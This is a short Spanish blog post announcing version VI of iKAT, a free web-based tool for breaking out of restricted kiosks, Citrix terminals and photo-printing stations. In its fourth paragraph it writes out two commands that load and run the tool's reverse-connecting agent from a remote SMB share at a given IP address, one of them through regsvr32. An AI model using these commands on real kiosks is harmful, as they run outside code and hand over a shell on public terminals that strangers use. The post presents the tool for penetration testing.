iKAT VI: nueva versión de la popular herramienta de ataque a kioskos de Internet

Paul Craig presentará oficialmente el próximo 15 de agosto y durante la conferencia XCon2012 de Pekín la revisión 2012 o versión VI de iKAT (The Interactive Kiosk Attack Tool), el estándar de-facto para pruebas de intrusión en entornos restringidos como Terminales Citrix, WebTVs y Kioskos de servicios de acceso a Internet, impresión de fotografías, directorios de aeropuertos, museos, etc...

iKAT es muy fácil de usar (podríamos llamarlo torpemente "hacking gráfico"), es 100% gratuito y se presenta como un sitio web SaaS (software como servicio) que podremos visitar desde cualquier navegador con el objetivo de explotar el kiosko de turno y obtener una consola del sistema. La url es http://ikat.ha.cked.net y actualmente podemos encontrar versiones para Windows, Linux y otra denominada PhotoKAT diseñada para explotar cualquier sistema que nos permita insertar un dispositivo USB o tarjeta de memoria (normalmente terminales de impresión de fotos).

Uno de los mayores cambios es la implementación de un modelo cliente-servidor en el que se incluye un agente en cada payload para establecer una conexión inversa hacia el servidor iKAT el cual se encargará de todas las tareas post-explotación. De esta forma se intenta evadir los bloqueos de los antivirus y los fabricantes de kioskos que, como podéis imaginar, ya estaban incluyendo sus herramientas en los primeros puestos de sus listas negras.

Otro aspecto a destacar es la publicación de un recurso SMB de lectura compartido que contiene el agente, su librería y varias herramientas. De esta forma podremos ejecutar el agente simplemente lanzando \\120.138.22.77\ikat\ikat.exe desde la línea de comandos o registrando su librería con regsvr32 \\120.138.22.77\ikat\ikat.dll, muy útil cuando podemos ejecutar comandos pero no podemos descargar ficheros.

Por lo demás, integración con Metasploit Browser AutoPWN, nuevas técnicas, más exploits, herramientas, complementos del navegador, ficheros PDF/Office y un sinfín de "trucos" más para comprometer este tipo de entornos. Así que cuidado si vas a imprimir tus fotos o a conectarte a Internet en un cibercafé o en un kiosko de un hotel porque, ¿a qué ahora los ves con otros ojos? lol

Comentarios